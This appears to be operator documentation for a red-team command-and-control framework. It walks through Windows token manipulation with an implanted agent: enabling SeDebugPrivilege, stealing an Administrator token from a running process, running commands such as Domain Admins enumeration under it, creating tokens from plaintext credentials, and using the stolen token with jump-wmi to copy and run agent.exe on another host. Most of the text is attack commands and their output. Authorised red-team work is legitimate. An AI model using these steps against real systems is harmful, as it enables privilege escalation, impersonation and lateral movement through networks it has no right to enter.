Token Manipulation

This walkthrough covers the full Windows token workflow - from identifying a target identity to stealing its token, using it for operations, and reverting cleanly. Token-based impersonation avoids passing plaintext credentials and leaves a smaller footprint than run-as.

Prerequisites

An active agent on a Windows machine
A process running under the target identity is already present on the machine (for token-steal)
OR valid credentials for the target user (for token-make)

How Token Storage Works

The agent maintains an internal token store - a numbered list of Windows tokens it has collected or created. Commands that support impersonation (including lateral movement commands) use the currently applied token.

token-steal / token-make
       ↓
  run commands    ← all commands execute under the applied identity
       ↓
token-use --nr 0  ← revert to the agent's original token

Workflow A - Steal a token from a running process

Step 1 - Find a process running as the target identity

ps

Output:

PID    PPID   Process          Arch                   Integrity  User
----   ----   ----             ----                   ----       ----
...
4832   1204   explorer.exe     x64                    Medium     CORP\jsmith
6240   580    mmc.exe          x64                    High       CORP\Administrator

Identify a process owned by CORP\Administrator - here PID 6240.

Step 2 - Enable SeDebugPrivilege (commercial payload only)

Stealing tokens from processes owned by other users requires elevated privileges. If running as a local admin but SeDebugPrivilege is not yet active:

1	`privilege-enable --privilege SeDebugPrivilege`

Output:

Available but not enabled privileges in process token:
  * SeIncreaseQuotaPrivilege
  * SeSecurityPrivilege
  * SeTakeOwnershipPrivilege
  * SeLoadDriverPrivilege
  * SeSystemProfilePrivilege
  * SeSystemtimePrivilege
  * SeProfileSingleProcessPrivilege
  * SeIncreaseBasePriorityPrivilege
  * SeCreatePagefilePrivilege
  * SeBackupPrivilege
  * SeRestorePrivilege
  * SeShutdownPrivilege
  * SeSystemEnvironmentPrivilege
  * SeRemoteShutdownPrivilege
  * SeUndockPrivilege
  * SeManageVolumePrivilege
  * SeIncreaseWorkingSetPrivilege
  * SeTimeZonePrivilege
  * SeCreateSymbolicLinkPrivilege
  * SeDelegateSessionUserImpersonatePrivilege
Enabled privileges in process token:
  * SeDebugPrivilege
  * SeChangeNotifyPrivilege
  * SeImpersonatePrivilege
  * SeCreateGlobalPrivilege

Step 3 - Steal the token (it's automatically selected also)

1	`token-steal --pid 6240`

Output:

1	`1: CORP\Administrator`

Step 4 - Operate as the impersonated user

All subsequent commands now run under CORP\Administrator:

1	`run --cmdline "whoami"`

Output:

1	`corp\administrator`

1	`run --cmdline "net group \"Domain Admins\" /domain"`

Step 5 - Revert to the original token

When done, restore the agent's default identity:

1	`token-use --nr 0`

Workflow B - Create a token from credentials

Use this when you have plaintext credentials but no process running as that user is present on the machine.

Step 1 - Create the token

1	`token-make --username "CORP\svc_backup" --password "BackupPass1!" --netonly true`

Output:

1	`1: CORP\svc_backup [netonly]`

Info

netonly: true creates a token where the credentials are only used for network authentication - the local process identity stays unchanged. This is equivalent to runas /netonly and is useful for accessing network resources (SMB, LDAP, WinRM) without fully impersonating the user locally.

Cleanup

Remove tokens that are no longer needed:

1	`token-del --nr 1`

Or clear the entire store:

1	`token-del-all`

Using Tokens with Lateral Movement

The jump-wmi, jump-service, and jump-winrm commands all respect the currently applied token. Instead of passing --username and --password, apply the token first:

1
2
3

token-steal --pid 6240
jump-wmi --target 10.10.10.20 --payloadId abc123 --copyMethod SMB
  --copyPath C:\Windows\Temp\agent.exe --cmdline C:\Windows\Temp\agent.exe

See the Lateral Movement use case for a full walkthrough of this pattern.